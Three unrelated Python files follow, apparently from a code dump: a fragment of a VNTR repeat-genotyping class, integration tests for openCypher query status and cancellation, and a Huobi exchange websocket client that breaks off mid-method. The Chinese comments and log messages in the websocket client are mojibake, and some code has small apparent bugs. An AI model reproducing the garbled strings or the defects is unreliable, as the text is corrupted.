self.find_frameshift_from_selected_reads(selected_reads) @time_usage def find_repeat_count_from_alignment_file(self, alignment_file, unmapped_filtered_reads): logging.debug('finding repeat count from alignment file for %s' % self.reference_vntr.id) selected_reads = self.select_illumina_reads(alignment_file, unmapped_filtered_reads) covered_repeats = [] flanking_repeats = [] total_counted_vntr_bp = 0 for selected_read in selected_reads: repeats = get_number_of_repeats_in_vpath(selected_read.vpath) total_counted_vntr_bp += get_number_of_repeat_bp_matches_in_vpath(selected_read.vpath) logging.debug('logp of read: %s' % str(selected_read.logp)) logging.debug('left flankign size: %s' % get_left_flanking_region_size_in_vpath(selected_read.vpath)) logging.debug('right flanking size: %s' % get_right_flanking_region_size_in_vpath(selected_read.vpath)) logging.debug(selected_read.sequence) visited_states = [state.name for idx, state in selected_read.vpath[1:-1]] if self.read_flanks_repeats_with_confidence(selected_read.vpath): logging.debug('spanning read visited states :%s' % visited_states) logging.debug('repeats: %s' % repeats) covered_repeats.append(repeats) else: flanking_repeats.append(repeats) flanking_repeats = reversed(sorted(flanking_repeats)) logging.info('flanked repeats: %s' % covered_repeats) logging.info('observed repeats: %s' % sorted(flanking_repeats)) min_valid_flanked = max(covered_repeats) if len(covered_repeats) > 0 else 0 max_flanking_repeat = [r for r in flanking_repeats if r == max(flanking_repeats) and r >= min_valid_flanked] if len(max_flanking_repeat) < 5: max_flanking_repeat = [] if self.reference_vntr.id not in settings.LONG_VNTRS: genotype = self.find_genotype_based_on_observed_repeats(covered_repeats + max_flanking_repeat) return genotype pattern_occurrences = total_counted_vntr_bp / float(len(self.reference_vntr.pattern)) read_mode = 'r' if alignment_file.endswith('sam') else 'rb' samfile = pysam.AlignmentFile(alignment_file, read_mode) reference = get_reference_genome_of_alignment_file(samfile) bias_detector = CoverageBiasDetector(alignment_file, self.reference_vntr.chromosome, reference) coverage_corrector = CoverageCorrector(bias_detector.get_gc_content_coverage_map()) logging.info('Sequencing mean coverage: %s' % coverage_corrector.get_sequencing_mean_coverage()) observed_copy_number = pattern_occurrences / coverage_corrector.get_sequencing_mean_coverage() scaled_copy_number = coverage_corrector.get_scaled_coverage(self.reference_vntr, observed_copy_number) logging.info('scaled copy number and observed copy number: %s, %s' % (scaled_copy_number, observed_copy_number)) return [scaled_copy_number] def find_repeat_count_from_short_reads(self, short_read_files, working_directory='./'): """ Map short read sequencing data to human reference genome (hg19) and call find_repeat_count_from_alignment_file :param short_read_files: short read sequencing data :param working_directory: directory for generating the outputs """ alignment_file = '' + short_read_files # TODO: use bowtie2 to map short reads to hg19 return self.find_repeat_count_from_alignment_file(alignment_file, working_directory) def find_accuracy(self, samfile='original_reads/paired_dat.sam'): """Find sensitivity and false positive reads for a set of simulated data """ reference_end_pos = self.reference_vntr.start_point + self.reference_vntr.get_length() related_reads, read_count = get_related_reads_and_read_count_in_samfile(self.reference_vntr.pattern, self.reference_vntr.start_point, read_file=samfile, pattern_end=reference_end_pos) # TODO selected_reads = [] occurrences = 0 avg_coverage = 1 true_positives = [read for read in selected_reads if read in related_reads] false_positives = [read for read in selected_reads if read not in true_positives] false_negatives = [read for read in related_reads if read not in selected_reads] # print('TP:', len(true_positives), 'FP:', len(false_positives), 'selected:', len(selected_reads)) # print('FN:', len(false_negatives)) sensitivity = float(len(true_positives)) / len(related_reads) if len(related_reads) > 0 else 0 if sensitivity > 0.9: print(sensitivity, len(false_positives)) if 1 > sensitivity > 0.9 and len(false_negatives) > 0 and len(false_positives) > 0: print('sensitivity ', sensitivity, ' FN:', false_negatives[0], ' FP:', false_positives[0]) with open('FP_and_sensitivity_HMM_read_scoring_method.txt', 'a') as outfile: outfile.write('%s\t%s\t%s\t%s\t%s\n' % ( len(false_positives), sensitivity, self.reference_vntr.id, len(self.reference_vntr.pattern), len(true_positives))) error = abs(len(self.reference_vntr.get_repeat_segments()) - occurrences / avg_coverage) print(error)
test_opencypher_query_without_iam.py
""" Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 """ import json import threading import logging import time import requests from requests import HTTPError from test.integration.DataDrivenOpenCypherTest import DataDrivenOpenCypherTest logger = logging.getLogger('TestOpenCypherStatusWithoutIam') class TestOpenCypherStatusWithIam(DataDrivenOpenCypherTest): def do_opencypher_query_save_result(self, query, res, bolt: bool = False): try: if bolt: res['result'] = self.client.opencyper_bolt(query) else: res['result'] = self.client.opencypher_http(query) except requests.HTTPError as exception: res['error'] = exception.response.json() def setUp(self) -> None: res = self.client.opencypher_status() for q in res['queries']: self.client.opencypher_cancel(q['queryId']) def test_do_opencypher_status_nonexistent(self): query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce" with self.assertRaises(HTTPError) as error: self.client.opencypher_status(query_id) err = json.loads(error.exception.response.content.decode('utf-8')) self.assertEqual(err['code'], "InvalidParameterException") expected_message = f'Supplied queryId {query_id} is invalid' self.assertEqual(err['detailedMessage'], expected_message) def test_do_opencypher_cancel_nonexistent(self): query_id = "ac7d5a03-00cf-4280-b464-edbcbf51ffce" with self.assertRaises(HTTPError) as error: self.client.opencypher_cancel(query_id) err = json.loads(error.exception.response.content.decode('utf-8')) self.assertEqual(err['code'], "InvalidParameterException") expected_message = f'Supplied queryId {query_id} is invalid' self.assertEqual(err['detailedMessage'], expected_message) def test_do_opencypher_cancel_empty_query_id(self): with self.assertRaises(ValueError): self.client.opencypher_cancel('') def test_do_opencypher_cancel_non_str_query_id(self): with self.assertRaises(ValueError): self.client.opencypher_cancel(42) def test_do_opencypher_status_and_cancel(self): query = '''MATCH(a)-->(b) MATCH(c)-->(d) RETURN a,b,c,d''' query_res = {} oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,)) oc_query_thread.start() time.sleep(3) status_res = self.client.opencypher_status() assert type(status_res) is dict assert 'acceptedQueryCount' in status_res assert 'runningQueryCount' in status_res assert 1 == status_res['runningQueryCount'] assert 'queries' in status_res query_id = '' for q in status_res['queries']: if query in q['queryString']: query_id = q['queryId'] assert query_id != '' cancel_res = self.client.opencypher_cancel(query_id) assert type(cancel_res) is dict assert cancel_res['status'] == '200 OK' oc_query_thread.join() assert 'result' not in query_res assert 'error' in query_res assert 'code' in query_res['error'] assert 'requestId' in query_res['error'] assert 'detailedMessage' in query_res['error'] assert 'CancelledByUserException' == query_res['error']['code'] def test_do_opencypher_status_and_cancel_silently(self): query = '''MATCH(a)-->(b) MATCH(c)-->(d) RETURN a,b,c,d''' query_res = {} oc_query_thread = threading.Thread(target=self.do_opencypher_query_save_result, args=(query, query_res,)) oc_query_thread.start() time.sleep(3) query_id = '' status = self.client.opencypher_status(query_id) assert status.status_code == 200 status_res = status.json() assert type(status_res) is dict assert 'acceptedQueryCount' in status_res assert 'runningQueryCount' in status_res assert 1 == status_res['runningQueryCount'] assert 'queries' in status_res query_id = '' for q in status_res['queries']: if query in q['queryString']: query_id = q['queryId'] assert query_id != '' self.assertNotEqual(query_id, '') cancel = self.client.opencypher_cancel(query_id) cancel_res = cancel.json() assert type(cancel_res) is dict assert cancel_res['status'] == '200 OK' oc_query_thread.join() assert type(query_res['result']) is dict assert 'a' in query_res['result']['head']['vars'] assert 'b' in query_res['result']['head']['vars'] assert 'c' in query_res['result']['head']['vars'] assert 'd' in query_res['result']['head']['vars'] assert [] == query_res['result']['results']['bindings'] def test_opencypher_bolt_query_with_cancellation(self): pass
core.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2018/9/20 0020 9:23 # @Author : Hadrianl # @File : core.py # @Contact : [email protected] import websocket as ws import gzip as gz import json from . import utils as u from .utils import logger, zmq_ctx from threading import Thread import datetime as dt from dateutil import parser from functools import wraps import zmq import pickle import time from abc import abstractmethod import uuid from .handler import BaseHandler from concurrent.futures import ThreadPoolExecutor logger.debug(f'<TESTING>LOG_TESTING') class BaseWebsocket(object): ws_count = 0 def __new__(cls, *args, **kwargs): cls.ws_count += 1 if cls is _AuthWS: from .utils import ACCESS_KEY, SECRET_KEY if not (ACCESS_KEY and SECRET_KEY): raise Exception('ACCESS_KEYๆˆ–SECRET_KEYๆœช่ฎพ็ฝฎ๏ผ') return object.__new__(cls) def send_message(self, msg): # ๅ‘้€ๆถˆๆฏ msg_json = json.dumps(msg).encode() self.ws.send(msg_json) def on_message(self, _msg): # ๆŽฅๆ”ถws็š„ๆถˆๆฏๆŽจ้€ๅนถๅค„็†๏ผŒๅŒ…ๆ‹ฌไบ†pingpong๏ผŒๅค„็†่ฎข้˜…ๅˆ—่กจ๏ผŒไปฅๅŠๅค„็†ๆ•ฐๆฎๆŽจ้€ json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') @abstractmethod def pub_msg(self, msg): """ๆ ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" raise NotImplementedError def on_error(self, error): logger.error(f'<้”™่ฏฏ>on_error:{error}') def on_close(self): logger.info(f'<่ฟžๆŽฅ>ๅทฒๆ–ญๅผ€ไธŽ{self.addr}็š„่ฟžๆŽฅ') if not self._active: return if self._reconn > 0: logger.info(f'<่ฟžๆŽฅ>ๅฐ่ฏ•ไธŽ{self.addr}่ฟ›่กŒ้‡่ฟž') self.__start() self._reconn -= 1 time.sleep(self._interval) else: logger.info(f'<่ฟžๆŽฅ>ๅฐ่ฏ•ไธŽ{self.addr}่ฟ›่กŒ้‡่ฟž') self.__start() time.sleep(self._interval) def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') # ------------------- ๆณจๅ†Œๅ›ž่ฐƒๅค„็†ๅ‡ฝๆ•ฐ ------------------------------- def register_onRsp(self, req): """ ๆทปๅŠ ๅ›ž่ฐƒๅค„็†ๅ‡ฝๆ•ฐ็š„่ฃ…้ฅฐๅ™จ :param req: ๅ…ทไฝ“็š„topic๏ผŒๅฆ‚ :return: """ def wrapper(_callback): callbackList = self._req_callbacks.setdefault(req, []) callbackList.append(_callback) return _callback return wrapper def unregister_onRsp(self, req): return self._req_callbacks.pop(req) # ------------------------------------------------------------------ # ------------------------- ๆณจๅ†Œhandler ----------------------------- def register_handler(self, handler): # ๆณจๅ†Œhandler if handler not in self._handlers: self._handlers.append(handler) handler.start(self.name) def unregister_handler(self, handler): # ๆณจ้”€handler if handler in self._handlers: self._handlers.remove(handler) handler.stop(self.name) def __add__(self, handler): if isinstance(handler, BaseHandler): self.register_handler(handler) else: raise Exception('{handler} is not aHandler') return self def __sub__(self, handler): if isinstance(handler, BaseHandler): self.unregister_handler(handler) else: raise Exception('{handler} is not aHandler') return self # ----------------------------------------------------------------- # --------------------- ๆณจๅ†Œhandle_func -------------------------- def register_handle_func(self, topic): # ๆณจๅ†Œhandle_func def _wrapper(_handle_func): if topic not in self._handle_funcs: self._handle_funcs[topic] = [] self._handle_funcs[topic].append(_handle_func) return _handle_func return _wrapper def unregister_handle_func(self, _handle_func_name, topic): """ ๆณจ้”€handle_func """ handler_list = self._handle_funcs.get(topic, []) for i, h in enumerate(handler_list): if h is _handle_func_name or h.__name__ == _handle_func_name: handler_list.pop(i) if self._handle_funcs.get(topic) == []: self._handle_funcs.pop(topic) # ----------------------------------------------------------------- # --------------------- handleๅฑžๆ€ง -------------------------------- @property def handlers(self): return self._handlers @property def handle_funcs(self): return self._handle_funcs @property def OnRsp_callbacks(self): return self._req_callbacks # ----------------------------------------------------------------- # -------------------------ๅผ€ๅ…ณws----------------------------------------- def run(self): if not hasattr(self, 'ws_thread') or not self.ws_thread.is_alive(): self.__start() def __start(self): self.ws = ws.WebSocketApp( self.addr, on_open=self.on_open, on_message=self.on_message, on_error=self.on_error, on_close=self.on_close, # on_data=self.on_data ) self.ws_thread = Thread(target=self.ws.run_forever, name=self.name) self.ws_thread.setDaemon(True) self.ws_thread.start() def stop(self): if hasattr(self, 'ws_thread') and self.ws_thread.is_alive(): self._active = False self.ws.close() # self.ws_thread.join() # ------------------------------------------------------------------------ class _AuthWS(BaseWebsocket): def __init__(self, host='api.huobi.br.com', reconn=10, interval=3): self._protocol = 'wss://' self._host = host self._path = '/ws/v1' self.addr = self._protocol + self._host + self._path self._threadPool = ThreadPoolExecutor(max_workers=3) # self.name = f'HuoBiAuthWS{self.ws_count}' self.name = f'HuoBiAuthWS_{uuid.uuid1()}' self.sub_dict = {} # ่ฎข้˜…ๅˆ—่กจ self._handlers = [] # ๅฏนmessageๅšๅค„็†็š„ๅค„็†ๅ‡ฝๆ•ฐๆˆ–ๅค„็†็ฑป self._req_callbacks = {} self._handle_funcs = {} self._auth_callbacks = [] self.ctx = zmq_ctx self.pub_socket = self.ctx.socket(zmq.PUB) self.pub_socket.bind(f'inproc://{self.name}') self._active = False self._reconn = reconn self._interval = interval def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') self.auth() logger.info(f'<้‰ดๆƒ>ๅ‘{self.addr}ๅ‘่ตท้‰ดๆƒ่ฏทๆฑ‚') def on_message(self, _msg): # ้‰ดๆƒws็š„ๆถˆๆฏๅค„็† json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') op = msg['op'] if op == 'ping': pong = {'op': 'pong', 'ts': msg['ts']} self.send_message(pong) if msg.setdefault('err-code', 0) == 0: if op == 'notify': self.pub_msg(msg) elif op == 'sub': logger.info( f'<่ฎข้˜…>Topic:{msg["topic"]}่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') elif op == 'unsub': logger.info( f'<่ฎข้˜…>Topic:{msg["topic"]}ๅ–ๆถˆ่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') elif op == 'req': logger.info(f'<่ฏทๆฑ‚>Topic:{msg["topic"]}่ฏทๆฑ‚ๆ•ฐๆฎๆˆๅŠŸ #{msg["cid"]}#') OnRsp = self._req_callbacks.get(msg['topic'], []) def callbackThread(_m): for cb in OnRsp: try: cb(_m) except Exception as e: logger.error(f'<่ฏทๆฑ‚ๅ›ž่ฐƒ>{msg["topic"]}็š„ๅ›ž่ฐƒๅ‡ฝๆ•ฐ{cb.__name__}ๅผ‚ๅธธ-{e}') task = self._threadPool.submit(callbackThread, msg) # _t = Thread(target=callbackThread, args=(msg,)) # _t.setDaemon(True) # _t.start() elif op == 'auth': logger.info( f'<้‰ดๆƒ>้‰ดๆƒๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') for cb in self._auth_callbacks: cb() else: logger.error( f'<้”™่ฏฏ>{msg.get("cid")}-OP:{op} ErrTime:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} ErrCode:{msg["err-code"]} ErrMsg:{msg["err-msg"]}' ) def pub_msg(self, msg): """ๆ ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" topic = msg.get('topic') self.pub_socket.send_multipart( [pickle.dumps(topic), pickle.dumps(msg)]) for h in self._handle_funcs.get(topic, []): h(msg) def auth(self, cid:str =''): from .utils import ACCESS_KEY, SECRET_KEY, createSign timestamp = dt.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S') params = { "AccessKeyId": ACCESS_KEY, "SignatureMethod": "HmacSHA256", "SignatureVersion": "2", "Timestamp": timestamp,} signature = createSign(params, 'GET', self._host, self._path, SECRET_KEY) params['Signature'] = signature params['op'] = 'auth' params['cid'] = cid self.send_message(params) return 'auth', cid def sub_accounts(self, cid:str=''): msg = {'op': 'sub', 'cid': cid, 'topic': 'accounts'} self.send_message(msg) logger.info(f'<่ฎข้˜…>accouts-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def unsub_accounts(self, cid:str=''): msg = {'op': 'unsub', 'cid': cid, 'topic': 'accounts'} self.send_message(msg) logger.info(f'<่ฎข้˜…>accouts-ๅ‘้€่ฎข้˜…ๅ–ๆถˆ่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def sub_orders(self, symbol='*', cid:str=''): """ :param symbol: '*'ไธบ่ฎข้˜…ๆ‰€ๆœ‰่ฎขๅ•ๅ˜ๅŒ– :param cid: :return: """ msg = {'op': 'sub', 'cid': cid, 'topic': f'orders.{symbol}'} self.send_message(msg) logger.info(f'<่ฎข้˜…>orders-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{cid}#') return msg['topic'], cid def unsub_orders(self, symbol='*', cid:str=''): """ :param symbol: '*'ไธบ่ฎข้˜…ๆ‰€ๆœ‰่ฎขๅ•ๅ˜ๅŒ– :param cid: :return: """ msg = {'op': 'unsub', 'cid': cid, 'topic': f'orders.{symbol}'} self.send_message(msg) logger.info(f'<่ฎข้˜…>orders-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{cid}#') return msg['topic'], cid # ------------------------------------------------------------------------ # ----------------------ๅธๆˆท่ฏทๆฑ‚ๅ‡ฝๆ•ฐ-------------------------------------- def req_accounts(self, cid:str=''): msg = {'op': 'req', 'cid': cid, 'topic': 'accounts.list'} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>accounts-ๅ‘้€่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def req_orders(self, acc_id, symbol, states:list, types:list=None, start_date=None, end_date=None, _from=None, direct=None, size=None, cid:str=''): states = ','.join(states) msg = {'op': 'req', 'account-id': acc_id, 'symbol': symbol, 'states': states, 'cid': cid, 'topic': 'orders.list'} if types: types = ','.join(types) msg['types'] = types if start_date: start_date = parser.parse(start_date).strftime('%Y-%m-%d') msg['start-date'] = start_date if end_date: end_date = parser.parse(end_date).strftime('%Y-%m-%d') msg['end-date'] = end_date if _from: msg['_from'] = _from if direct: msg['direct'] = direct if size: msg['size'] = size self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>orders-ๅ‘้€่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def req_orders_detail(self, order_id, cid:str=''): msg = {'op': 'req', 'order-id': order_id, 'cid': cid, 'topic': 'orders.detail'} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>accounts-ๅ‘้€่ฏทๆฑ‚ #{cid}#') return msg['topic'], cid def after_auth(self,_func): # wsๅผ€ๅฏไน‹ๅŽ้œ€่ฆๅฎŒๆˆ็š„ๅˆๅง‹ๅŒ–ๅค„็† @wraps(_func) def _callback(): try: _func() except Exception as e: logger.exception(f'afer_openๅ›ž่ฐƒๅค„็†้”™่ฏฏ{e}') self._auth_callbacks.append(_callback) return _callback class _HBWS(BaseWebsocket): def __init__(self, host='api.huobi.br.com', reconn=10, interval=3): self._protocol = 'wss://' self._host = host self._path = '/ws' self.addr = self._protocol + self._host + self._path self._threadPool = ThreadPoolExecutor(max_workers=3) # self.name = f'HuoBiWS{self.ws_count}' self.name = f'HuoBiWS_{uuid.uuid1()}' self.sub_dict = {} # ่ฎข้˜…ๅˆ—่กจ self._handlers = [] # ๅฏนmessageๅšๅค„็†็š„ๅค„็†ๅ‡ฝๆ•ฐๆˆ–ๅค„็†็ฑป self._req_callbacks = {} self._handle_funcs = {} self._open_callbacks = [] self.ctx = zmq_ctx self.pub_socket = self.ctx.socket(zmq.PUB) self.pub_socket.bind(f'inproc://{self.name}') self._active = False self._reconn = reconn self._interval = interval def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') for topic, subbed in self.sub_dict.items(): msg = {'sub': subbed['topic'], 'id': subbed['id']} self.send_message(msg) else: logger.info(f'<่ฎข้˜…>ๅˆๅง‹ๅŒ–่ฎข้˜…ๅฎŒๆˆ') for fun in self._open_callbacks: fun() def on_message(self, _msg): # ๆŽฅๆ”ถws็š„ๆถˆๆฏๆŽจ้€ๅนถๅค„็†๏ผŒๅŒ…ๆ‹ฌไบ†pingpong๏ผŒๅค„็†่ฎข้˜…ๅˆ—่กจ๏ผŒไปฅๅŠๅค„็†ๆ•ฐๆฎๆŽจ้€ json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') if 'ping' in msg: pong = {'pong': msg['ping']} self.send_message(pong) elif 'status' in msg: if msg['status'] == 'ok': if 'subbed' in msg: self.sub_dict.update({ msg['subbed']: { 'topic': msg['subbed'], 'id': msg['id'] } }) logger.info( f'<่ฎข้˜…>Topic:{msg["subbed"]}่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["id"]}#' ) elif 'unsubbed' in msg: self.sub_dict.pop(msg['unsubbed']) logger.info( f'<่ฎข้˜…>Topic:{msg["unsubbed"]}ๅ–ๆถˆ่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["id"]}#' ) elif 'rep' in msg: logger.info(f'<่ฏทๆฑ‚>Topic:{msg["rep"]}่ฏทๆฑ‚ๆ•ฐๆฎๆˆๅŠŸ #{msg["id"]}#') OnRsp = self._req_callbacks.get(msg['rep'], []) def callbackThread(_m): for cb in OnRsp: try: cb(_m) except Exception as e: logger.error(f'<่ฏทๆฑ‚ๅ›ž่ฐƒ>{msg["rep"]}็š„ๅ›ž่ฐƒๅ‡ฝๆ•ฐ{cb.__name__}ๅผ‚ๅธธ-{e}') task = self._threadPool.submit(callbackThread, msg) elif 'data' in msg: self.pub_msg(msg) # _t = Thread(target=callbackThread, args=(msg, )) # _t.setDaemon(True) # _t.start() elif msg['status'] == 'error': logger.error( f'<้”™่ฏฏ>{msg.get("id")}-ErrTime:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} ErrCode:{msg["err-code"]} ErrMsg:{msg["err-msg"]}' ) else: self.pub_msg(msg) def pub_msg(self, msg): """ๆ ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" if 'ch' in msg: topic = msg.get('ch') self.pub_socket.send_multipart( [pickle.dumps(topic), pickle.dumps(msg)]) for h in self._handle_funcs.get(topic, []): h(msg) @staticmethod def _check_info(**kwargs): log = [] if 'period' in kwargs and kwargs['period'] not in u.PERIOD: log.append(f'<้ชŒ่ฏ>ไธๅญ˜ๅœจPeriod:{kwargs["period"]}') if 'depth' in kwargs and kwargs['depth'] not in u.DEPTH: log.append(f'<้ชŒ่ฏ>ไธๅญ˜ๅœจDepth:{kwargs["depth"]}') if log: for l in log: logger.warning(l) return False else: return True # ----------------------่กŒๆƒ…่ฎข้˜…ๅ‡ฝๆ•ฐ--------------------------------------- def sub_overview(self, _id=''): msg = {'sub': 'market.overview', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>overview-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚ #{_id}#') return msg['sub'], _id def unsub_overview(self, _id=''): msg = {'unsub': 'market.overview', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>overview-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚ #{_id}#') return msg['unsub'], _id def sub_kline(self, symbol, period, _id=''): if self._check_info(symbol=symbol, period=period): msg = {'sub': f'market.{symbol}.kline.{period}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>kline-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['sub'], _id def unsub_kline(self, symbol, period, _id=''): if self._check_info(symbol=symbol, period=period): msg = {'unsub': f'market.{symbol}.kline.{period}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>kline-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['unsub'], _id def sub_depth(self, symbol, depth=0, _id=''): if self._check_info(symbol=symbol, depth=depth): msg = {'sub': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>depth-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['sub'], _id def unsub_depth(self, symbol, depth=0, _id=''): if self._check_info(symbol=symbol, depth=depth): msg = { 'unsub': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id } self.send_message(msg) logger.info( f'<่ฎข้˜…>depth-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['unsub'], _id def sub_tick(self, symbol, _id=''): if self._check_info(symbol=symbol): msg = {'sub': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>tick-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['sub'], _id def unsub_tick(self, symbol, _id=''): if self._check_info(symbol=symbol): msg = {'unsub': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>tick-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['unsub'], _id def sub_all_lastest_24h_ohlc(self, _id=''): msg = {'sub': f'market.tickers', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>all_ticks-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚ #{_id}#') return msg['sub'], _id def unsub_all_lastest_24h_ohlc(self, _id=''): msg = {'unsub': f'market.tickers', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>all_ticks-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚ #{_id}#') return msg['unsub'], _id # ------------------------------------------------------------------------- # -------------------------่กŒๆƒ…่ฏทๆฑ‚ๅ‡ฝๆ•ฐ---------------------------------------- def req_kline(self, symbol, period, _id='', **kwargs): if self._check_info(symbol=symbol, period=period): msg = {'req': f'market.{symbol}.kline.{period}', 'id': _id} if '_from' in kwargs: _from = parser.parse(kwargs['_from']).timestamp() if isinstance( kwargs['_from'], str) else kwargs['_from'] msg.update({'from': int(_from)}) if '_to' in kwargs: _to = parser.parse(kwargs['_to']).timestamp() if isinstance( kwargs['_to'], str) else kwargs['_to'] msg.update({'to': int(_to)}) self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>kline-ๅ‘้€่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['req'], _id def req_depth(self, symbol, depth=0, _id=''): if self._check_info(depth=depth): msg = {'req': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>depth-ๅ‘้€่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['req'], _id def req_tick(self, symbol, _id=''): msg = {'req': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>tick-ๅ‘้€่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['req'], _id def req_symbol(self, symbol, _id=''): msg = {'req': f'market.{symbol}.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>symbol-ๅ‘้€่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['req'], _id # ------------------------------------------------------------------------- def after_open(self,_func): # wsๅผ€ๅฏไน‹ๅŽ้œ€่ฆๅฎŒๆˆ็š„ๅˆๅง‹ๅŒ–ๅค„็† @wraps(_func) def _callback(): try: _func() except Exception as e: logger.exception(f'afer_openๅ›ž่ฐƒๅค„็†้”™่ฏฏ{e}') self._open_callbacks.append(_callback) return _callback class _HBDerivativesWS(BaseWebsocket): def __init__(self, host='www.hbdm.com', reconn=10, interval=3): self._protocol = 'wss://' self._host = host self._path = '/ws' self.addr = self._protocol + self._host + self._path self._threadPool = ThreadPoolExecutor(max_workers=3) # self.name = f'HuoBiWS{self.ws_count}' self.name = f'HuoBiDerivativesWS_{uuid.uuid1()}' self.sub_dict = {} # ่ฎข้˜…ๅˆ—่กจ self._handlers = [] # ๅฏนmessageๅšๅค„็†็š„ๅค„็†ๅ‡ฝๆ•ฐๆˆ–ๅค„็†็ฑป self._req_callbacks = {} self._handle_funcs = {} self._open_callbacks = [] self.ctx = zmq_ctx self.pub_socket = self.ctx.socket(zmq.PUB) self.pub_socket.bind(f'inproc://{self.name}') self._active = False self._reconn = reconn self._interval = interval def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') for topic, subbed in self.sub_dict.items(): msg = {'sub': subbed['topic'], 'id': subbed['id']} self.send_message(msg) else: logger.info(f'<่ฎข้˜…>ๅˆๅง‹ๅŒ–่ฎข้˜…ๅฎŒๆˆ') for fun in self._open_callbacks: fun() def on_message(self, _msg): # 